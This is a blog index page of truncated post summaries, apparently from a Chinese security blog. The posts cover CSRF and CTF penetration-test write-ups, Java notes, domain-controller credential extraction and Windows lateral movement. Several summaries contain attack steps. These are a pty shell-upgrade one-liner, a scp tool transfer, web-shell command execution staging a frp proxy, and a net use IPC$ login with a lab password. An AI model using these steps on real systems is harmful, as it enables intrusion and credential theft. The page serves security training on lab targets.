摘要:
burpsuite靶场 CSRF 无防御 靶场地址 https://portswigger.net/web-security/csrf/lab-no-defenses 正式开始 1.登录 2.更改email,抓包 3.创建poc <html> <!-- CSRF PoC - generated by 阅读全文
摘要:
java数据库与JDBC java与MYSQL 1.下载驱动 https://dev.mysql.com/downloads/connector/j/ https://dev.mysql.com/get/Downloads/Connector-J/mysql-connector-j-8.1.0.zi 阅读全文
摘要:
java面向对象学习 封装 封装是面向对象编程中的一种重要概念,它指的是将数据和操作数据的方法封装在一个类中,并通过访问修饰符来控制对这些数据和方法的访问权限。 封装的目的是隐藏类的内部实现细节,只暴露必要的接口给外部使用,从而提高代码的安全性和可维护性。 下面是一个简单的例子,演示了如何使用封装来 阅读全文
摘要:
ctfshow web859_有跳板机 WP 使用xshell连接 执行 sudo -s python3 -c 'import pty; pty.spawn("/bin/bash")' 想用sftp传输fscan,失败 利用ssh传输fscan scp -P 28299 fscan_386 ctfs 阅读全文
摘要:
bugku渗透测试3 WP flag1,2,3 爆破网段 发现1,2,10,138,250的时候有变化 猜测木马文件名为shell.php 远程下载frpc http://192.168.0.10/shell.php?cmd=chmod 777 frpc http://192.168.0.10/sh 阅读全文
摘要:
bugku渗透测试2 WP bugku渗透测试1 WP有详细的frp,proxifier配置 https://www.cnblogs.com/thebeastofwar/p/17744965.html 注意这次因为有三次frp代理,所以注意代理命名和端口号要不同(frpc1.ini,frpc2.in 阅读全文
摘要:
bugku渗透测试1 WP 利用fscan对主站进行扫描 flag1 flag2 在url中输入http://xxx/admin会跳转到登录页面,弱口令admin admin 提示/home flag3 在上传后缀这里添加php,点击立即提交 回到前台,点击php教程,点击运行预览 然后输入一句话木 阅读全文
摘要:
记录一次修不好的proxifier最终解决 前言 在做一道内网渗透题时,配置好frp和proxifier 发现proxifier报了错误 有 cannot configure windows network try to run syssetting tool manually Error: Win 阅读全文
摘要:
内网域控制器安全 环境搭建 https://www.cnblogs.com/thebeastofwar/p/17688666.html 前言 在通常情况下,即使用友管理员权限也无法读取域控制器中的C:\Windows\NTDS\ntds.dit 文件,ntds.dit是个二进制文件,包含了很多敏感信 阅读全文
摘要:
内网横向移动 常用Windows远程连接和相关命令 1.IPC 1)建立连接 net use \\192.168.162.140\ipc$ /user:Administrator hongrisec@2019 在命令行中输入 net use 查看当前连接 2)ipc$的利用条件 a)开启了139,4 阅读全文